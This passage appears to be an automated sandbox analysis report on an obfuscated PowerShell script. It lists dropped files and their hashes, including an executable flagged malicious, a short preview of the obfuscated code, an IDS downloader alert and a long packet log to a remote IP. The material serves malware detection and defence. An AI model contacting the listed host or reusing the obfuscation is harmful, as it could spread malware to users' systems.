                              C:\Users\user\AppData\Local\Temp\52821801\osEhezBV.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2011444
                              Entropy (8bit):6.104381684032337
                              Encrypted:false
                              SSDEEP:49152:DpD+okC1j/B5ZMQJrhES5Jr4l5/WSpCe/:gOZMt
                              MD5:BCC04F3C8F29B9533C8AFF0681D4EB4F
                              SHA1:2EDB98E832959106BC3E6110DFB0A20A549BDCB1
                              SHA-256:D0E19B9FED36046A80CA84C68624EEED3FAC491962FC121D1D7B6433006990DC
                              SHA-512:DCD54AE36962E5072BE4B31E20BC7D42A4FF9D90E95930F09A0CBDB6E0F7495A38409DEFCACF072C8C452188DBBF4863F5F8E21A24F50D36FFDAE61959176CF1
                              Malicious:false
                              Reputation:low
                              Preview:|.U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|.U....................................

                              C:\Users\user\AppData\Local\Temp\52821801\updater.exe

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):853168
                              Entropy (8bit):6.541453707916163
                              Encrypted:false
                              SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawVQ:6T3E53Myyzl0hMf1tr7CawK
                              MD5:9EB440B3924AC66A47AE14D9FA83352D
                              SHA1:26D266289F1292E191F90E887F584E23D4AEB698
                              SHA-256:54E470D1BE7C796D92A7408EA07614268D82C8E75BD21B60992633075762FBAF
                              SHA-512:3B7EDA5C8614C4FC7D582B9F114ECF5624133945F060D3042F337AA64F202EF4A4E0CF6C7CE88E98C617363007D9EE04CB27DAF03BDFD5A82C815CA9F41F5CB9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_as1ostru.wdv.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywhbt5jh.f3f.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6225
                              Entropy (8bit):3.742513866712502
                              Encrypted:false
                              SSDEEP:48:GTx2MhMA/CLU20Q7ukvhkvklCyw4EHU3l6jSogZoxJ7JakHU3lzjSogZoxJ7JO1:xMhX/CgrlkvhkvCCttHU3THeHU3EHL
                              MD5:F82D8B24018A86CB35AADFCF15FE4EBD
                              SHA1:ECA7E9C9692C26D1086D207C0FF8110AD7E355AA
                              SHA-256:CF10E304C438F5C0B0BB04AE9D09EE5FEDFBF6193ECB64234C848E72FE622C71
                              SHA-512:0A33EC50A273DB449944B4772BC9E031A82ABE0B913AE022339F46DA114361F233590D49A6A247CA42F1DF98E884C645ECA2BF5396CD03635749E7C65696CFAF
                              Malicious:false
                              Preview:...................................FL..................F.".. .....*_.......TP..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......TP..1.#.TP......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.;..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.;..Roaming.@......EW.=.Y.;..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.;..........................f:5.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.;....9...........

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ECIMPVTEOTNPHS2WQX5X.temp

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6225
                              Entropy (8bit):3.742513866712502
                              Encrypted:false
                              SSDEEP:48:GTx2MhMA/CLU20Q7ukvhkvklCyw4EHU3l6jSogZoxJ7JakHU3lzjSogZoxJ7JO1:xMhX/CgrlkvhkvCCttHU3THeHU3EHL
                              MD5:F82D8B24018A86CB35AADFCF15FE4EBD
                              SHA1:ECA7E9C9692C26D1086D207C0FF8110AD7E355AA
                              SHA-256:CF10E304C438F5C0B0BB04AE9D09EE5FEDFBF6193ECB64234C848E72FE622C71
                              SHA-512:0A33EC50A273DB449944B4772BC9E031A82ABE0B913AE022339F46DA114361F233590D49A6A247CA42F1DF98E884C645ECA2BF5396CD03635749E7C65696CFAF
                              Malicious:false
                              Preview:...................................FL..................F.".. .....*_.......TP..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......TP..1.#.TP......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.;..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.;..Roaming.@......EW.=.Y.;..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.;..........................f:5.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.;....9...........

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (36495), with no line terminators
                              Entropy (8bit):3.424624023881272
                              TrID:
                                File name:SFHgtxFGtB.ps1
                                File size:36'495 bytes
                                MD5:6a34a3dbed524eed6d73c72188418d80
                                SHA1:6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667
                                SHA256:45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503
                                SHA512:6fd7dc31836db3062aea0ab2bf0c7b0c45ee188fa9f2a872de968db2635aefc404d057444ec15ffea66585f6aa8e18acf2088e9523ac9138680ef6061465db30
                                SSDEEP:96:YdgXCdz1ArDw1DQXZB08+uFk0WK49Ms00IYY+blwIAAwIYmEYsR0KkMEIIAAYwwP:EZu
                                TLSH:CEF2A969B56C329BCAD5F76C1237EE67027AC19E95D348CC728AD6D1278122902F4F33
                                File Content Preview:( '$$$$$'| % {${@;}=+ $() } { ${][~}= ${@;} } {${]$} =++${@;}}{${-)!} = (${@;} = ${@;} +${]$})}{ ${%-[}= (${@;} = ${@;} +${]$}) } {${ }=( ${@;}=${@;} + ${]$} ) }{${/(} = ( ${@;} =${@;}+ ${]$} ) } {${~} = ( ${@;}= ${

                                File Icon

                                Icon Hash:3270d6baae77db44

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-12-17T08:24:41.038991+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749700104.21.87.65443TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 17, 2024 08:24:35.120508909 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:35.120553970 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:35.120672941 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:35.132642031 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:35.132661104 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:36.350312948 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:36.350433111 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:36.355382919 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:36.355396032 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:36.355694056 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:36.368031979 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:36.411339998 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010037899 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010189056 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010262012 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010354996 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010391951 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.010404110 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.010418892 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.018043041 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.018134117 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.018158913 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.018167019 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.018397093 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.026209116 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.034715891 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.034770966 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.034802914 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.034810066 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.034964085 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.129385948 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.183070898 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.183080912 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.205286980 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.205324888 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.205379009 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.205390930 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.205704927 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.213056087 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.223907948 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.223944902 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.223989010 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.224016905 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.224025011 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.224042892 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.231751919 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.231898069 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.231904984 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.247421980 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.247477055 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.247484922 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.255193949 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.255280972 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.255290031 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.255320072 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.255395889 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.263039112 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.270838022 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.270899057 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.270904064 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.270912886 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.270994902 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.278433084 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.286012888 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.286178112 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.286196947 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.315005064 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.315088034 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.315169096 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.315191984 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.318243980 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.322658062 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.370541096 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.393448114 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.401020050 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.401048899 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.401096106 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.401103020 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.401138067 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.409889936 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.409966946 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.409976959 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.410041094 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.418721914 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.418744087 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.418822050 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.423079967 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.423177958 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.423187971 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.423264980 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.431619883 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.431647062 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.431797981 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.440432072 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.440510988 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.440524101 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.440593004 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.444808006 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.444910049 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.453470945 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.453562021 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.462137938 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.462234020 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.470854998 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.470938921 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.475290060 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.475358009 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.479688883 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.479736090 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.518731117 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.518815041 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.528548002 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.528645992 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.585402966 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.585478067 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.589524031 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.589644909 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.592418909 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.592503071 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.597835064 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.597989082 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.603003979 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.603091955 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.605662107 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.605732918 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.610687017 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.610847950 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.615746021 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.615823984 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.618331909 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.618459940 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.623259068 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.623347998 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.628259897 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.628338099 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.630860090 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.630960941 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.635915995 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.636017084 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.640851974 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.640943050 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.645847082 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.645914078 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.648000002 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.648103952 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.651874065 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.651962996 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.653886080 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.654012918 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.657665014 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.657778978 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.661441088 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.661542892 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.665344954 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.665410042 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.667447090 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.667557001 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.671271086 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.671354055 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.679502010 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.679608107 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.680514097 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.680576086 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.695060968 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.695205927 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.695965052 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.711710930 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.715564966 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.784915924 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.784946918 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.784976006 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.785068989 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.785113096 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.785120964 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.794013977 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.794061899 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.794161081 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.794193029 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.794225931 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.795366049 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.795582056 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.795598984 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.796344995 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.803057909 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.803117037 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.803195000 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.803195000 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.803216934 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.809379101 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.809448957 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.809469938 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.809488058 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.809577942 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.814439058 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.814672947 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.814692020 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.815675974 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.815736055 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.815752029 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.816735029 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.821976900 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.822112083 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.822213888 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.822213888 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.822238922 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.822434902 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.829535007 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.829580069 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.829648972 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.829663992 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.829817057 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.836111069 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.836177111 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.836273909 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.836275101 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:37.836297035 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:37.869883060 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.018147945 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.018192053 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.018235922 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.018248081 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.018296003 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.018296003 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.035310984 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.072572947 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.081703901 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.081855059 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086106062 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086802006 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.086857080 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.086930990 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086930990 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086941957 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.090423107 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.090492010 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.090507030 CET44349699104.21.87.65192.168.2.7
